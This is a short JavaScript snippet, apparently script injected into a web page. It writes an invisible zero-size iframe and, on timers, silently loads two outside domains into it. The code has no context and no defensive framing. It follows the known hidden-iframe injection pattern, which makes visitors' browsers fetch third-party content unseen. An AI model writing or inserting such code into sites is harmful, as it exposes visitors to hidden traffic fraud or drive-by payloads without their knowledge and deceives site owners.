document.write("<iframe id=\"xmframe\" name=\"xmframe\" frameborder=\"0\" width=\"0\" height=\"0\" scrolling=\"no\"></iframe>");
window.setTimeout("countxm()",10000)
window.setTimeout("countxm1()",3000)
//window.setTimeout("countxm2()",30000)

function countxm(){
  document.getElementById("xmframe").src="http://www.west163.net";	
}
function countxm1(){
  document.getElementById("xmframe").src="http://www.xo68.com";	
}
function countxm2(){
  document.getElementById("xmframe").src="";	
}

